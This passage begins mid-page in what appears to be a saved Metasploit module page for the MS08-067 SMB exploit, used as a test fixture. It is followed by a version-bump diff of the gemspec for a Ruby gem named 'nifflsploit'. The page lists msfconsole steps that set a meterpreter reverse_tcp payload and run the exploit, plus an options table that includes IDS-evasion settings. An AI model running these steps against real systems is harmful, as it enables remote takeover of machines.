href="/modules/exploit/windows/smb/ms06_066_nwwks">exploit/windows/smb/ms06_066_nwwks</a></li> </ul> <!--[if ie 9]> <style type="text/css" media="screen"> .mBannerInfo { filter: none; } </style> <![endif]--> <br/><h2>Exploit Usage Information</h2> <div class="msfconsole"> $ <b>msfconsole</b><br/> <br/> ## ### ## ##<br/> ## ## #### ###### #### ##### ##### ## #### ######<br/> ####### ## ## ## ## ## ## ## ## ## ## ### ##<br/> ####### ###### ## ##### #### ## ## ## ## ## ## ##<br/> ## # ## ## ## ## ## ## ##### ## ## ## ## ##<br/> ## ## #### ### ##### ##### ## #### #### #### ###<br/> ##<br/> <br/> msf > <b>use exploit/windows/smb/ms08_067_netapi</b><br/> msf exploit(ms08_067_netapi) > <b>show payloads</b><br/> msf exploit(ms08_067_netapi) > <b>set PAYLOAD windows/meterpreter/reverse_tcp</b><br/> msf exploit(ms08_067_netapi) > <b>set LHOST [MY IP ADDRESS]</b><br/> msf exploit(ms08_067_netapi) > <b>set RHOST [TARGET IP]</b><br/> msf exploit(ms08_067_netapi) > <b>exploit</b><br/> <br/> </div> <br/><h2>Exploit Module Options</h2> <div class="marB20"> <table cellpadding="6" cellspacing="0" width="100%" border="1"> <tr class='rowcola'> <td class='optreq'>RHOST</td> <td>The target address</td> </tr> <tr class='rowcola'> <td class='optreq'>RPORT</td> <td>Set the SMB service port (default: 445)</td> </tr> <tr class='rowcola'> <td class='optreq'>SMBPIPE</td> <td>The pipe name to use (BROWSER, SRVSVC) (default: BROWSER)</td> </tr> <tr class='rowcola'> <td class='optopt'>CHOST</td> <td>The local client address</td> </tr> <tr class='rowcola'> <td class='optopt'>CPORT</td> <td>The local client port</td> </tr> <tr class='rowcola'> <td class='optopt'>ConnectTimeout</td> <td>Maximum number of seconds to establish a TCP connection</td> </tr> <tr class='rowcola'> <td class='optopt'>ContextInformationFile</td> <td>The information file that contains context information</td> </tr> <tr class='rowcola'> <td class='optopt'>DCERPC::ReadTimeout</td> <td>The number of seconds to wait for DCERPC responses</td> </tr> <tr class='rowcola'> <td class='optopt'>DisablePayloadHandler</td> <td>Disable the handler code for the selected payload</td> </tr> <tr class='rowcola'> <td class='optopt'>EnableContextEncoding</td> <td>Use transient context when encoding payloads</td> </tr> <tr class='rowcola'> <td class='optopt'>NTLM::SendLM</td> <td>Always send the LANMAN response (except when NTLMv2_session is specified)</td> </tr> <tr class='rowcola'> <td class='optopt'>NTLM::SendNTLM</td> <td>Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses</td> </tr> <tr class='rowcola'> <td class='optopt'>NTLM::SendSPN</td> <td>Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required</td> </tr> <tr class='rowcola'> <td class='optopt'>NTLM::UseLMKey</td> <td>Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent</td> </tr> <tr class='rowcola'> <td class='optopt'>NTLM::UseNTLM2_session</td> <td>Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session</td> </tr> <tr class='rowcola'> <td class='optopt'>NTLM::UseNTLMv2</td> <td>Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true</td> </tr> <tr class='rowcola'> <td class='optopt'>Proxies</td> <td>Use a proxy chain</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::ChunkSize</td> <td>The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::Native_LM</td> <td>The Native LM to send during authentication</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::Native_OS</td> <td>The Native OS to send during authentication</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::VerifySignature</td> <td>Enforces client-side verification of server response signatures</td> </tr> <tr class='rowcola'> <td class='optopt'>SMBDirect</td> <td>The target port is a raw SMB service (not NetBIOS)</td> </tr> <tr class='rowcola'> <td class='optopt'>SMBDomain</td> <td>The Windows domain to use for authentication</td> </tr> <tr class='rowcola'> <td class='optopt'>SMBName</td> <td>The NetBIOS hostname (required for port 139 connections)</td> </tr> <tr class='rowcola'> <td class='optopt'>SMBPass</td> <td>The password for the specified username</td> </tr> <tr class='rowcola'> <td class='optopt'>SMBUser</td> <td>The username to authenticate as</td> </tr> <tr class='rowcola'> <td class='optopt'>SSL</td> <td>Negotiate SSL for outgoing connections</td> </tr> <tr class='rowcola'> <td class='optopt'>SSLVersion</td> <td>Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)</td> </tr> <tr class='rowcola'> <td class='optopt'>VERBOSE</td> <td>Enable detailed status messages</td> </tr> <tr class='rowcola'> <td class='optopt'>WORKSPACE</td> <td>Specify the workspace for this module</td> </tr> <tr class='rowcola'> <td class='optopt'>WfsDelay</td> <td>Additional delay when waiting for a session</td> </tr> <tr class='rowcola'> <td class='optopt'>DCERPC::fake_bind_multi</td> <td>Use multi-context bind calls</td> </tr> <tr class='rowcola'> <td class='optopt'>DCERPC::fake_bind_multi_append</td> <td>Set the number of UUIDs to append the target</td> </tr> <tr class='rowcola'> <td class='optopt'>DCERPC::fake_bind_multi_prepend</td> <td>Set the number of UUIDs to prepend before the target</td> </tr> <tr class='rowcola'> <td class='optopt'>DCERPC::max_frag_size</td> <td>Set the DCERPC packet fragmentation size</td> </tr> <tr class='rowcola'> <td class='optopt'>DCERPC::smb_pipeio</td> <td>Use a different delivery method for accessing named pipes (accepted: rw, trans)</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::obscure_trans_pipe_level</td> <td>Obscure PIPE string in TransNamedPipe (level 0-3)</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::pad_data_level</td> <td>Place extra padding between headers and data (level 0-3)</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::pad_file_level</td> <td>Obscure path names used in open/create (level 0-3)</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::pipe_evasion</td> <td>Enable segmented read/writes for SMB Pipes</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::pipe_read_max_size</td> <td>Maximum buffer size for pipe reads</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::pipe_read_min_size</td> <td>Minimum buffer size for pipe reads</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::pipe_write_max_size</td> <td>Maximum buffer size for pipe writes</td> </tr> <tr class='rowcola'> <td class='optopt'>SMB::pipe_write_min_size</td> <td>Minimum buffer size for pipe writes</td> </tr> <tr class='rowcola'> <td class='optopt'>TCP::max_send_size</td> <td>Maxiumum tcp segment size. (0 = disable)</td> </tr> <tr class='rowcola'> <td class='optopt'>TCP::send_delay</td> <td>Delays inserted before every send. (0 = disable)</td> </tr> </table> </div> <!--[if ie 9]> <style type="text/css" media="screen"> .mBannerInfo { filter: none; } </style> <![endif]--> </div><!-- lCol --> </section><!-- mainContent --> </div> <footer class="footer"> <div class="footerPad clearfix"> <div class="clearfix copyright"> <a href="http://www.rapid7.com" target="_blank"><img src="/revamp/images/r7-footer-logo.png" title="Rapid7" alt="Rapid7" width="110" height="18" /></a> <span>© 2013 Rapid7</span> </div><!--copyright--> <nav class="footerNav"> <ul class="clearfix"> <li><a href="https://community.rapid7.com/docs/DOC-2223" target="_blank">Legal</a></li> <li><a href="https://community.rapid7.com/login.jspa" target="_blank">Licence</a></li> <li><a href="http://www.rapid7.com/privacy.jsp" target="_blank">Privacy Policy</a></li> <li><a href="http://www.rapid7.com/disclosure.jsp" target="_blank">Disclosure Policy</a></li> <li><a href="http://www.rapid7.com/contact/" target="_blank">Contact</a></li> <li class="twitIcon"><a class="blue" href="http://twitter.com/Rapid7" target="_blank">@Rapid7</a></li> <li><a class="blue" href="http://twitter.com/metasploit" target="_blank">@Metasploit</a></li> </ul> </nav> </div> </footer><!--footer--> </div> </div> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-4622520-2']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: nifflsploit
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.0.
|
|
4
|
+
version: 0.0.2
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Michael Carlson
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2013-
|
|
11
|
+
date: 2013-05-01 00:00:00.000000000 Z
|
|
12
12
|
dependencies:
|
|
13
13
|
- !ruby/object:Gem::Dependency
|
|
14
14
|
name: rspec
|
|
@@ -55,10 +55,12 @@ files:
|
|
|
55
55
|
- lib/nifflsploit/query.rb
|
|
56
56
|
- lib/nifflsploit/result.rb
|
|
57
57
|
- lib/nifflsploit/version.rb
|
|
58
|
+
- nifflsploit-0.0.1.gem
|
|
58
59
|
- nifflsploit.gemspec
|
|
59
60
|
- spec/lib/nifflsploit/query_spec.rb
|
|
60
61
|
- spec/lib/nifflsploit/result_spec.rb
|
|
61
62
|
- spec/lib/nifflsploit_spec.rb
|
|
63
|
+
- spec/support/ms08_response.html
|
|
62
64
|
- spec/support/positive_response.html
|
|
63
65
|
homepage: https://github.com/Prandium/nifflsploit
|
|
64
66
|
licenses: []
|
|
@@ -87,4 +89,5 @@ test_files:
|
|
|
87
89
|
- spec/lib/nifflsploit/query_spec.rb
|
|
88
90
|
- spec/lib/nifflsploit/result_spec.rb
|
|
89
91
|
- spec/lib/nifflsploit_spec.rb
|
|
92
|
+
- spec/support/ms08_response.html
|
|
90
93
|
- spec/support/positive_response.html
|